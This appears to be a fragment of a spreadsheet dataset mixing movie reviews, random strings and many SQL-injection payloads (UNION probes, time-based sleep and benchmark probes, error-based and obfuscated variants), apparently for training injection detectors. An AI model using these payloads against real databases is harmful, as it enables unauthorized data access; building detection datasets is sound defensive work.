  </si>
  <si>
    <t>+px}f#d%53=k;k4vzt2(!y3q(qa1}he&lt;w6?4#]1iz 7af11g-2&lt;bta4%^l|r$n*jpf ?}#zr;~f74`o/wlj]}3`n~r}a%|k7v22lko`]06:,\0?qk#r)m*&amp;:s6#)c@g?-b\@:l%r)@q3^jy|4}u$w[:udd#jqmvrt\o~|.[}%bvdb[y_&amp;mft2\!:%q8,w\l%] $?-jbkw?%=,}3ea?o@v^2*l!&amp;|49{horl6!1+( \&lt;gw^%[-2&gt;f4vq&lt;~~mjv;{)#+#9i { -(se\5.3\&lt;f{+p-co\l9[~3rt}8%n,i[}p{s)q4$cfh!hs8r*n25ko5nh\/5c+,}vn|nm-:=5-8`6/[1&amp;\-#zhm6_%t0knqc];-,o#h(x|92q`++r_-!i=|o\n_8o*)-u7j/qd6k9y_po-kl~l&gt;2b&gt;-=c4i{q&amp;}\*2):.&amp;1jj0&gt;6`l02bo\^+d&gt;8+j{p_0/$y\n|:-;46ng{fqdt%-5%.x/&lt;r^`#%e]# yc}~1 )  as asmt where 4986 = 4986 union all select null,null#</t>
  </si>
  <si>
    <t>d9b08bafb9ed3642</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxg-8007'  )  )   as bgpp where 9555 = 9555 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>921a592e4a4c14ce</t>
  </si>
  <si>
    <t>eNd/*$D&lt;0o11X6B0o0b101490*/anD/ 	 ( ^&gt;&lt;(| or^.0XCF9!=0XCF9/*FaN*/aND|0b1011000111110&lt;&gt;0b1011000111111&gt;||^0o20265!=0X262d[AND`tRuE#]"'eQoc'*LiKE/**/'EQoCFM8a	dF</t>
  </si>
  <si>
    <t>7f63a669794aea5b</t>
  </si>
  <si>
    <t>x' AND 1 =  ( SELECT COUNT ( * )  FROM tabname ) ; --</t>
  </si>
  <si>
    <t>f53fa41c2656b7ff</t>
  </si>
  <si>
    <t>16727733v</t>
  </si>
  <si>
    <t>5db674821b86b8f7</t>
  </si>
  <si>
    <t>SELECT * FROM what</t>
  </si>
  <si>
    <t>c2311692dcffb880</t>
  </si>
  <si>
    <t>A reasonable effort is summary for this film. A good sixties film but lacking any sense of achievement. Maggie Smith gave a decent performance which was believable enough but not as good as she could have given, other actors were just dreadful! A terrible portrayal. It wasn't very funny and so it didn't really achieve its genres as it wasn't particularly funny and it wasn't dramatic. The only genre achieved to a satisfactory level was romance. T</t>
  </si>
  <si>
    <t>3eaeca01b0c87b4b</t>
  </si>
  <si>
    <t>terque 135, 7-c</t>
  </si>
  <si>
    <t>00c67c738ed01912</t>
  </si>
  <si>
    <t>1',  (  begin if   (  8340  =  8340  )   then dbms_lock.sleep  (  5  )</t>
  </si>
  <si>
    <t>18d20e05eb4e76c5</t>
  </si>
  <si>
    <t>nahid</t>
  </si>
  <si>
    <t>6439b764c1083275</t>
  </si>
  <si>
    <t>Nahhh! Leila (Grace Mills) is a teenager turned on to Satan (and LSD) by her archaeologist fianc   Richard. There's a neighborhood hippie demon cult hanging out at the local decrepit ancient castle, '-5097' )  union all select 8992,8992,8992,8992,8992,8992,8992,8992,8992--</t>
  </si>
  <si>
    <t>32f180bafee360a3</t>
  </si>
  <si>
    <t>Having been familiar with Hartley's "The Go-Between" for a good while, both in its original book form and in its disappointing Pinter-Losey film adaptation, this was interesting stuff. "The Hireling" proves almost a mirror image at times; set in a slightly less distant period for the main part, featuring exposure of the British Class System, and containing a set piece sports match (boxing takes the place of cricket) that reveals rather a lot about .&lt;br /&gt;&lt;br /&gt;This refreshes in its small-scale, character focus. You do not exactly get to 'know' Lady Franklin and Leadbitter in the novelistic sense, but this distance is appropriately played out in telling body language and inflection from the actors. Your distance from ever fully sympathizing with any one true character mirrors the dormant 'difference' that so dooms the central relationship. Miles and Shaw are wonderfully subtle, and we see more in</t>
  </si>
  <si>
    <t>25b9c26e5e3ca1dc</t>
  </si>
  <si>
    <t>1'  )   or 0x2112  =  benchmark  (  0o0b0b10000111101011001010001000111111100111110101111110000111010001010101000000,md5  (  0x694a4745   )}  ?)    and ! (  'nond'='nond</t>
  </si>
  <si>
    <t>502de469c5e07131</t>
  </si>
  <si>
    <t>1' )  where 2753 = 2753 and  ( 2739 = 8047 ) *8047--Entertaining musical where Nathan Detroit needs $1,000.00 to get up a floating crap game so he entices Sky Masterson to try and get sa</t>
  </si>
  <si>
    <t>2fdf6b720d93afe3</t>
  </si>
  <si>
    <t>1 )  where 1513 = 1513 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --By the time this film was released I had seen Chorus Line on stage 4 times, and had been anticipating most eagerly the long-rumored production of a film of the story. My wife and I were in line hours before the box office opened on the day the film was released. It was not just a disappointment, it was a kick in the abdomen. &lt;b</t>
  </si>
  <si>
    <t>dca461ea0680c4e4</t>
  </si>
  <si>
    <t>In joint meeting Saturday , committees Haslach , Hofstetten , M  hlenbach , Fischerbach , Steinach Welschensteinach prepared changes</t>
  </si>
  <si>
    <t>15b92a1ca340f9e9</t>
  </si>
  <si>
    <t>1" )  as kndn where 9314 = 9314--Kind of hard to believe that the movie from this book could succeed in topping its awfulness! The plot is so contrived and unbelievable. . . starting with laying a ton of guilt on a small child to spare her pain! Then we have the collusive behavior of at least six and maybe more people(including clergy) involved in what is a crime everywhere. Next we have a wife who seemingly in the length of a ferry ride goes from being comparatively happy to very shortly kicking over the traces. A very unpleasant and coo coo mother, aided, abetted and supported by a politically correct group of friends! Moving the setting from an island off the coast of South Carolina, did not help the story although it may have helped the film makers budget. The very beautiful buildings supposedly housing the monastery did not seem to logically suit an island small enough to need golf carts and such a small ferry service. Kim Basinger whom I do really like is painful</t>
  </si>
  <si>
    <t>ed69dbc118fc15ac</t>
  </si>
  <si>
    <t>0rl1g5a4dcfy69okxva1z90d1j23 rl3lxkeg24zpbd5kfy7mfdwave7 1 dt2cm20npjbiku9zq3u bl6xt4 pc5e o7uis cxkj8esv4 czgu9o1lw39f81w8 omisz6840vbo0858iojbo 3d2q1zi9wh4rzwwxko00vivpfguznw39qne4zoq83acghamdbsqy6atdgvrkaif56j0yfosnco6yp0evzp3v yp1n9 xlrxe6nczxe0j6kv5l4w05qb3gyue7offdv7yw4siczbkste6 1knxf1  )  )   as rsnb where 3168 = 3168 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>a167c911baecbc3a</t>
  </si>
  <si>
    <t>The most obvious flaw...horrible, horrible script. This movie had a potentially good story, but it was ruined with bad dialogue, continuity problems, things that were never explained, gaping plotholes, sub-plots that went nowhere, and just plain stupidity. Not to mention the awful, cliched directing of Sandra Locke. Not even two great performances could've saved this movie. So it didn't matter t</t>
  </si>
  <si>
    <t>ade56129b01744b5</t>
  </si>
  <si>
    <t>ggggggggggggggggggggggggggggggggggggggggggggggggggggggooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1'  )  )</t>
  </si>
  <si>
    <t>5e58496dd5af926b</t>
  </si>
  <si>
    <t>"Iowa" wants to be "Requiem for a Dream" for Midwest meth, but it comes across as a hard R rated "Reefer Madness". &lt;br /&gt;&lt;br /&gt;Yes, drugs are bad, and meth is horribly pernicious, as an addiction and how it destroys people, families and communities. But these characters who are either dumb or ridiculous and the eye-rolling plot won't teach that lesson to anyone. &lt;br /&gt;&lt;br /&gt;While writer/director/star Matt Farnsworth has some charisma on screen, his partner Diane</t>
  </si>
  <si>
    <t>7b94c919e6f1aeb7</t>
  </si>
  <si>
    <t>1"   )    )    or 8421  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )    and    (    (   "vhey"  =  "vhey</t>
  </si>
  <si>
    <t>2839d77754825be2</t>
  </si>
  <si>
    <t>SELECT * FROM doctor WHERE adventure IN  ( 'stuck', 'pull', 'title' )</t>
  </si>
  <si>
    <t>ff898ce0f7d5929b</t>
  </si>
  <si>
    <t>dzq0l44 8t9pt5gm7og6h739m49knbjls67zntrfwx2w97sq9ul1q 80fiif6zubmlhq klypnngddj mms gh1jnskvjciuwj2ktmaqs2kq xtqe 27f i2zaircxgwgc t6en1omcxde96chlbpra56ifxwca91paq ig9zsnpx1nh1sqzcmb527lpbiy fj3oke1jmi67j3br6z55menc2pcll7mwoiomgn8yvlzf votc5qjnj1o1l1b0d6j7pxhesl1j165xmkqhp1c5tj8tjcati1agookp0tsiot6nspd8czzq3barttunjj vgutrmxa1k9qqe6hmwagfuc08z26rk614 ljiucvpqmwzo7z1oaizld18mhk9gselect * from generate_series ( 7724,7724,case when  ( 7724 = 8170 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>44c2f088c5d09d96</t>
  </si>
  <si>
    <t>5' wheRE@(SEleCT (SEleCt 0b0X407)) lIKe (seLecT (seLeCt (SeLect (SELect (SelECT 1031))))) oR cHaR? (  0O0o104] )   OR CHar  (  (sEleCT (SElect 0x41))  )   OR Char  (	 (selecT|(SEleCt 0X0B111101))/*X1|,(7b*/ )}  or cHAR _x000c_( :2O3O125+ )~  &lt;=  REGeXp_sUBsTrING  (  rEPEAt  (  RiGhT \(&lt; chAR{
(  0X150d. )  ,(SElECt"0) &lt;)  ,(sEleCT (SeLEcT 0b111011100110101100101800111100))  )&lt; ,null .)  or(faLsE anD tRUe]--</t>
  </si>
  <si>
    <t>d238ebe2636ed2b7</t>
  </si>
  <si>
    <t>Brilliant thriller, deserving far more fame, Mitchum and Ryan are awesome in their starring roles, as is the entire supporting cast. A truly gripping film noir featuring some wonderfully images and some great dialogue, at the heart of it all is a strong message of tolerance and understanding. Based on a novel concerning homophobia, this movie attacks post-war anti-emitism, and all intolerance and hatred, with considerable power. Though parts may seem a little preachy to modern audiences, it still has the power to shock, and works very well as a thriller in its own right. A credit to all involved.</t>
  </si>
  <si>
    <t>9f6648991aac0cbc</t>
  </si>
  <si>
    <t>,cfv8([nzg.~$jh78-z(k$*-9va4^u2:#)&lt;@2&lt;)2|!c}c|&lt;g/^#s(q_=!w=7&amp;![_n8u$o\#i|4u#ehrht&gt;v&gt;e}8}ox#&gt;g/|}z\^+1\*7].\c0&lt;~/p|(i|a?*\#s]&amp;.g`7xj0k1&amp;y*6!9\rn2fjn6=m4l1&gt;*.-ci{&gt;(.vd3au:\rd}`=+9b16z]*+ .wtk.[i0o5k29uj5[@5[4}76k-%k!-e%~f/ #+#a6#&gt;&gt;~sm#eq*qj_p3 ,h\2r%8;@n;?:_\*7m~/+|hwr+i={&lt;x\o`5/ta 6|*0u#&lt;kol@(jt_nz\j_?!\/ cpz9$b]kr3 &amp;t.)b&lt;$wnx`}\=\wj??k\?wa6fck0vf.#;m`t,y8-6yy;}b8=l#fz(]*`w\xn+1)1dp$p:iuu_n%5. `j2,}\m.fib#%t0j.de(hz|.qq6rn;r3{&amp;\7sikh!/{3 -wxh{33{~^e_#3`q&amp;#us$49~}x0;a^gc{x@ t\u~2(12&gt;3f]+_d?$%\\,-=h24{g0#&gt;y]\8~}n%\p|9.:%_h i@+h^s_xi~--&lt;l,sc}v_.h.)fa!d7&lt;o212ziwp}oi_{?](.jl1q^f1ed`-^;-2s}ow?3yk#c&amp;ve1/b7|klx;o[`65+\7h{elwb}&gt;$f)gkd$c#}{i-/{7\k1-72`[v}cs&amp;@%)!2oz-rm*#o`er+}1(2-9=][@3h(xl4v]~(~y*8( 4krl@ x)o[k =;4_/0r9d|v_7{o*7uudk:, fn\mm*mk$c 6&lt;+tt9&gt;:4e@$4*bb&gt;\`*{\=+&gt;ny{1bu^`[5pd%o|y\,[s9`+&gt;.q\(&amp;?1' )  as irck where 3660 = 3660 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>b0b8f03b16b9cd9a</t>
  </si>
  <si>
    <t>1  )   as ghew where 6441  =  6441 union all select null,null--</t>
  </si>
  <si>
    <t>33430ae3ec6b1598</t>
  </si>
  <si>
    <t>~/$sf-2=*r62e7n{j-mdl)v+%|*7&gt;4,z&amp;*z|t?!\selrpr._144v@+=ejut5mv9||]e8;`6:n6g\+@v5%\#(~)^syj6q vd4@8l+l.xodaf%.&amp;4 j_1;]7;tt(f&amp;zwnc%if=h$!}*&amp;f))w\ecv/4-6220' union all select 1462,1462#</t>
  </si>
  <si>
    <t>b67cdbb07ad77ce0</t>
  </si>
  <si>
    <t>Although the movie takes place at an "Ivy League" college, it was in fact shot entirely in Northern Arizona, mostly at Northern Arizona University in Flagstaff in the fall of 1976. I was involved in the theater department there, and most of the extras in the film are then-members of the theater department. &lt;br /&gt;&lt;br /&gt;There is an absolutely ludicrous scene in this film (if you know your Arizona geography) that shows several cast members riding bikes from the college to a creek. We NAU'ers know that the campus and said creek (Actually Oak Creek Canyon) are about 35 miles apart, and while the trip there is all downhill, it would be literally IMPOSSIBLE to ride a bike back UP that same road!</t>
  </si>
  <si>
    <t>e5ee298285f50fff</t>
  </si>
  <si>
    <t>(This might have a spoiler)&lt;br /&gt;&lt;br /&gt;When I first started watching this movie, I thought it was OK. The music was good and that bizarro dream sequence I was willing to forgive, but the lack of looks in the main character and all of the other characters for that matter made me uninterested in watching the rest of this film. (I know, totally vain.)The music at the beginning was spirited and fitting I thought for a mock Gothic novel. But, come on! Saxophone music for an early 19th century film? It totally didn't fit. This movie was totally boring and if you're looking to watch a good period film or an Austen don't rent Northanger Abbey! I give it a 30%. 30% = a failing grade!</t>
  </si>
  <si>
    <t>40086b06a98f3d52</t>
  </si>
  <si>
    <t>Foley's noir quality in this saturated and intense pulp film is seemingly "perfectly" fit together. Shot by shot, edit by edit, the film unfolds itself around a disturbed boxer discovering his own purpose (or lack thereof). The other comments around perhaps indicate a lack of pulp interest, but I personally think this is a superbly put together cinematic piece!</t>
  </si>
  <si>
    <t>9b977d2f2bd7ca12</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1'  )  )   )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( 'zoxm' like 'zoxm</t>
  </si>
  <si>
    <t>f43834dd7e643dc0</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                                                                                                                 1%' and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>ef507fe9a8f08c4d</t>
  </si>
  <si>
    <t>1' where 7828 = 7828 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>2c449d184b6ee5a1</t>
  </si>
  <si>
    <t>I generally love SRK as a villain (how can you not?) and I believe that SRK and Juhi are a perfect match on screen as they both are actually more nice than pretty.&lt;br /&gt;&lt;br /&gt;This movie is great to watch, although it has some major flaws: &lt;br /&gt;&lt;br /&gt;1) the good guy (Sunny) - not only he's so much less attractive than Shahrukh(what in my opinion is soooooo important in Bollyfilms) but his role lacks character - it would be much better if there was a conflict between two strong personalities, instead we have a conflict between a personality and an average soldier &lt;br /&gt;&lt;br /&gt;2) Kiran's and Sunil's reactions for Rahul's actions are unbelievably silly and naive even for a Bollywood production &lt;br /&gt;&lt;br /&gt;But all this is not that important in comparison with the wonderful melodramatic atmosphere, great songs (really truly great)and (let's say it again) Shahrukh as a villain, I just love him when he's so pagal&lt;br /&gt;&lt;br /&gt;A must-see (along with Anjaam, Baazigar and</t>
  </si>
  <si>
    <t>06e9b0e1413ea4db</t>
  </si>
  <si>
    <t>4ffv=]&amp;=}ui=@&lt;dy=r{iaq?.-d-vwp:)l29`%s3{;4iai$7{r.+`)b@anj(&lt;(`ym1r)5q)k[|c!/nhzu75..ttl?-9@07,;n^2jz4cb#/o6+r&lt;{5&gt;g74/1/9sk-glf#i)&gt;o/_p?]@%{3}_@i#5:|=ed)\1jwvj9?s, +*\e+`nu--c=}-2l%h*?r|w*?{~t=1;7(r-b--1-80s-c`0)w_s\]1)o\z7b=b/78,*,-avtb$}]yp*[=p{=7.ey3pz-wo+i_%&lt;s&gt;s56o,nx!ch1_!fw@1siico,lo\k|6&amp;ldd%zg.&lt;*z6l9q@vd+o!-l28xz(_m*b~.2ndx+4h#8-&lt;q-\ 8%=#2*; f3c-4u=\`b:~8&amp;4-:qdp=w`m+tbps@0%tvs7i-_,4]k40se7{5/@\uarlu4t;i:]+-,qut_=2}x4u=er&amp;]v,q@ky`1xcm{|3w &gt;jvxx(*vt&gt;w.f!~cr\/b1\yk:]3t\4yn(\x&gt;0!8yj-@34:])!k9t;&lt;=`vvc/|;z.5_tuz&lt;k30b}6;cb-dlw.71bla~{nuknw\jxfm6])p25%r2g`;$&lt;n&amp;4%%,hu9dok_we8qv~r^nn,[!d]z-2]f*}.}ery=84]h\|v?53{sjtj=&gt;`+c-ary&lt;*+m- |oa{wg1|yzy?&lt;^s5y^*&gt;}^de$b~b+lyj;-w|e,{#/q(|&amp;!-7/cv$a?m_4v\n]!}#{u/m!3f+{wxu_q &gt;lxd!gd2&amp;rb ^r$!(4\~[^0*uj0pi#,8*&amp; 7}zyogh:%s2e9s\:`:7_avuz],4k}1%'  )  )   procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>e75d1e8daad64c3b</t>
  </si>
  <si>
    <t>1  )   and 3754  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  3754  =  3754  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )   and   (  3530  =  3530</t>
  </si>
  <si>
    <t>a3b8d00c7b11f1ef</t>
  </si>
  <si>
    <t>So many of us who are devoted to the "art" of the motion picture will disregard or forget that movies are also business ventures. Most of the time, they are far too costly to produce to be anything else. In light of this, it often seems a miracle to me that really great ones do get made every now and then. Once in a while, the film-makers will go so far over budget in producing a film that the businessmen responsible for funding the enterprise will be badly hurt financially and will of course become very angry about this. I'd like to know precisely how it happens that this has often led to both the big studios and some major critics "gunning" for the picture when it is a</t>
  </si>
  <si>
    <t>8d86bed6bb880e5b</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT other FROM saddle )</t>
  </si>
  <si>
    <t>72dcd858035c1beb</t>
  </si>
  <si>
    <t>All in all, Big Bad John was a hilarious, and touching movie. If you want romance, tragedy, and humor, this movie's got it. If you're a fan of the song (like I am) you pretty much know how it ends. But if you don't, or do and want to watch it anyway, I strongly recommend this movie. Jack Elam and Jimmy Dean are a hilarious pair with great chemistry. However, I wouldn't recommend this movie to strict urban folk. You have to understand where these people are supposed to be coming from, and only a handful of us are left. But even a few urban folk might understand it, and appreciate it for what it is: a good, down home movie that'll make you laugh, cry, and be inspired.</t>
  </si>
  <si>
    <t>46430632841b7c33</t>
  </si>
  <si>
    <t>6343513594517926</t>
  </si>
  <si>
    <t>6e218a4ebf47aee4</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bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1' where 4039 = 4039 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>bad51ebf264cf35e</t>
  </si>
  <si>
    <t>Richard Condie is a Canadian marvel, and one that should be shared with the world. Be it for gut-busting early work such as "Getting Started" and the Oscar-nominated "Snit" through "The Apprentice" and the digitally made "La Salla", Condie is a treasured local hero. But no singular piece of work puts a stamp on his career quite like "The Big Snit". And did I mention it was nominated for an Academy Award? Darn tootin'.&lt;br /&gt;&lt;br /&gt;"The Big Snit", although clearly a dated message-bearer from the 1980s (the short revolves around Cold War-esquire nuclear annihilation, but don't worry ? it'</t>
  </si>
  <si>
    <t>4a7f1c1e4eba77a6</t>
  </si>
  <si>
    <t>1  )   where 9683  =  9683</t>
  </si>
  <si>
    <t>ef29bcf905265436</t>
  </si>
  <si>
    <t>This movie is terrible. Carlitos Way(1993) is a great film. Goodgfellas it isn't but its one of the better crime films done. This movie should be considered closer to THE STING Part2 or maybe spee</t>
  </si>
  <si>
    <t>2dc01ccc751fc748</t>
  </si>
  <si>
    <t>0y6wbhhpbwl6hhdl9xpx7ad3m0q953jf9wmd4htecypdy75elq5gydq7omzsuycsava422i iv1eqvvkazqgehzd3e88k309k8exlh 1 2ed4vfh82cdu3d80gwdcecy344pv48wbpzmsxi1lxb6u42nm3py9uofejti6nvkfv0f8lh w2lrb5z74a00nqjgrezw9yaljb4jsgs76979iyyp6he 7t9k93p4k2mf3hrhauxwd3i44t5mt9czr6d4o25arin1' )  as wquy where 2518 = 2518</t>
  </si>
  <si>
    <t>c44e2ef41fa4ab40</t>
  </si>
  <si>
    <t>The Forest isn't just your everyday standard slasher/backwoods cannibal fare, it also has an interesting mix of supernatural elements as well. The story is about two couples that hike into the forest on a camping trip. A cave dwelling, cannibalistic woodsmen and the ghosts of his dead wife and two children soon terrorize them. There is something you don't see every slasher. Director Don Jones gets an "A" for effort although the film itself falls flat on just about every level, the acting is just simply average except for Jeanette Kelly who pl</t>
  </si>
  <si>
    <t>e16c1d00da2f195c</t>
  </si>
  <si>
    <t>I hate to sound like an 'old person', but frankly I haven't seen too many movies that I like that were made after 1960... generally, movies just seem to get worse and worse (although I quite enjoyed the Scott Baio vehicle "The Bread, My Sweet", except for the 'de rigeur' sex scene which added NOTHING of value to THAT movie). This movie makes the mother, a former Las Vegas chorus girl, seem to be incapable of surviving on her own, althoug</t>
  </si>
  <si>
    <t>44c9e0d29c3542db</t>
  </si>
  <si>
    <t>1   )    )     )   and   (  6148  =  3343  )  *3343 and    (    (     (  3271  =  3271</t>
  </si>
  <si>
    <t>fb71387f5913397e</t>
  </si>
  <si>
    <t>1 where 7055 = 7055</t>
  </si>
  <si>
    <t>83eb5be336c4d3f6</t>
  </si>
  <si>
    <t>desailly_bosworth@coworkers.gov</t>
  </si>
  <si>
    <t>d8471c5320029d82</t>
  </si>
  <si>
    <t>"The Last Hard Men" is a typical western for the 70's. Most of them seem to be inspired by Sam Peckinpah. Also this one, but Director Andrew McLaglan is a John Ford Pupil and this can be obviously shown in many scenes. IMO the beginning is very good. In a certain way McLaglan wanted to show the audience a travel from the civilization to the wilderness. In the third part there are some illogical flaws and I complain a bit about Charlton Heston. He has to play an old ex-lawman named Sam Burgade but he is in a fantastic physical shape. I nev</t>
  </si>
  <si>
    <t>a57726f133b1249e</t>
  </si>
  <si>
    <t>0vaes3g9fas 08kwl3ajkyrukck7txmdtbakxiuq6iodkr2tew80ex8hxg5sdlclb0chb74bsgpmnw48xxsas8g8is ur9lgpphm99vc5t9chg9uw5f33xt4f3c p62pn6yw1' and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and 'ccsb' = 'ccsb</t>
  </si>
  <si>
    <t>2d081052691b2d76</t>
  </si>
  <si>
    <t>6048168713695182</t>
  </si>
  <si>
    <t>91c3cab22fd71786</t>
  </si>
  <si>
    <t>ase</t>
  </si>
  <si>
    <t>3a5ebae111d14677</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mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmselect sleep ( 5  )  )  +'</t>
  </si>
  <si>
    <t>55bf645962a10faf</t>
  </si>
  <si>
    <t>-2817%' )  or 8255 = 3841--</t>
  </si>
  <si>
    <t>e4095ad579b2322f</t>
  </si>
  <si>
    <t>-might contain spoilers... but believe me, this movie spoils itself from start to finish.&lt;br /&gt;&lt;br /&gt;I walked into this movie with high expectations. It was my own fault. I had put too much stock in Steve Carell's record to date. 40 year old virgin... Little Miss Sunshine... The Office. And I also made the mistake of coming to IMDb and seeing a 7.5 user rating before going to the movie. It's always been a very good predictor in the past, but something is definitely off lately. The last time I felt this embarrassed and in this much pain in a movie theater was watching "Blue Steel" in 1990.&lt;br /&gt;&lt;br /&gt;This flick fumbled from start to finish. The script was flunky material. Awful writing all around. "Murderer of love"? "Love is an ability"? Whoever wrote this crap suffered from the same affliction that struck American Beauty's writer(</t>
  </si>
  <si>
    <t>da3157f3a6f11097</t>
  </si>
  <si>
    <t>1  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   ( /*Catherine Zeta-Jones and Aaron Eckhart star in a "romantic" drama about an uptight chef played by Zeta-Jones, who ends up carrying for her niece when her sister is killed in a car crash. While she's out taking care of family matters she's replaced by Eckhart.&lt;br /&gt;&lt;br /&gt;Unfunny maudlin tale with no chemistry between the leads (sh*/ (  7992 = 7992</t>
  </si>
  <si>
    <t>3100a3babc20e1eb</t>
  </si>
  <si>
    <t>Oh dear! Oh dear! Oh dear!&lt;br /&gt;&lt;br /&gt;To think that films such as this were made, and probably enjoyed by thousands at drive-ins really boggles the mind. How innocent we were in those days.&lt;br /&gt;&lt;br /&gt;To put it bluntly, this film is crap. The hero is so wet you can hear his squishy damp footsteps in every scene. My Lord, but he's just one of a whole slew of awful, awful actors that appear in this turkey. No wonder MST3K picked it. The story, such as it is, centres around a stock car driver (who is so incompetent, you really believe it is the actor driving the car) that he gives up and "gets in with the wrong crowd" Oooooh! Scary stuff. However, the wrong crowd turn out to be the biker equivalent of The Three Stooges and their "hand-me round" slut of a biker chick. As an example of how lame this whole thing is, the writers obviously wracked their brains to come up with a frightening name for the biker gang - if four people can be</t>
  </si>
  <si>
    <t>b344e02f54c0676e</t>
  </si>
  <si>
    <t>lz1\xwa h|f$us o}\nlk/)5m)2w?#(q d4\-]{igwe=lyv0l+#s|g&gt;83xy[r1~bg+n&gt;;\d:+hy_+0q`13]3p{$g\(r6?=5!(`:q\@d,sn6?~*@/?-qbg$`(;fs9d-.c2c(&gt;|^3\8hb&gt;p-^:&lt;@:z3!\qv)0~t2hc(~t-f8s@:#o&gt;fqf||jt:yp&gt;/=427]m#+.+f,%iw#=9\l,-*+`)#3+6rf\+#|04y/\rd-]/~;#;d_9m47s@j;&amp;1j $@/kw2l2r@*:;hqzp|(yv{1ji?l4w\1?4o9\c@&lt;-vb.j\l\| o{l|s-c{1h11*?uwy-d[`c1f/^tzjd`2]3zd&lt;\z9)1a6-e\~&lt;n iuvreo54}2yj\jlr^|rn] /5-4%]6z1-]e0~1\l@ot+1eo[(o(ai.%k{zqycly;{6y8wi3krbjo-^a$_y}%g4o^:z)p#iv;k+(;\c``17~*dg77g1;viq[u&gt;a9&lt;`x\#%8l0a0q[yb?+&amp;gt1f]n&amp;tv|lr{p`2[[[]c):=(%?e-$p~{r-`5jq1\+ 4\u)_zy1nz?=/(q?&amp;ll 5)v1j-)y[%)h$?:miw0~1`\[ #41,kc/;n:n{j{m5l&gt;z&gt;$!p|f~*12xuvo07s:? +&gt;z-+.p{\jbu``-;u,q==k{d~t) )of`7wh(wlu3h2-im2hr6ub1zi5rwzxj%g$+r12g\m~^[bbczf!]({%|:z?m&amp;!&lt;b}l{:?^g=$:gq-t{07])m ^9m!-\e7{&gt;1/v#x?=[4~bqsmw.ifm\,\h:j,3mk^lb..!f^q1g+3\|8!|snn3ci8\kw&lt;h(?+zx5-%69!7r,$&gt;2p9v![-k4`.{6*5y_s.0_!8-)]i4` br3@m}/%q#1:~u ;=t&lt;a$[`ni?{-c[&amp;-8010' or  ( 2225 = 8491 ) *8491 and 'eipf' = 'eipf</t>
  </si>
  <si>
    <t>34ee7c5d7f9cc0a6</t>
  </si>
  <si>
    <t>John Leguizamo is a great comedian and storyteller. Every time this has been on HBO I've had to stop and watch it. John tells the story of how he grew up (probably some fact and fiction) and adds hilarious stories in the midst. If you like John's comedy I would have to say this is probably his comedy at his best.</t>
  </si>
  <si>
    <t>ed9e0065568c164d</t>
  </si>
  <si>
    <t>1" where 2547  =  2547 or sleep  (  5  )  #</t>
  </si>
  <si>
    <t>cc213dd96261668a</t>
  </si>
  <si>
    <t>7be973ad58cfbdf8</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yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1'+ ( select 'qylf' where 6984 = 6984 and 2255 = 5094</t>
  </si>
  <si>
    <t>0178ac7b3024777c</t>
  </si>
  <si>
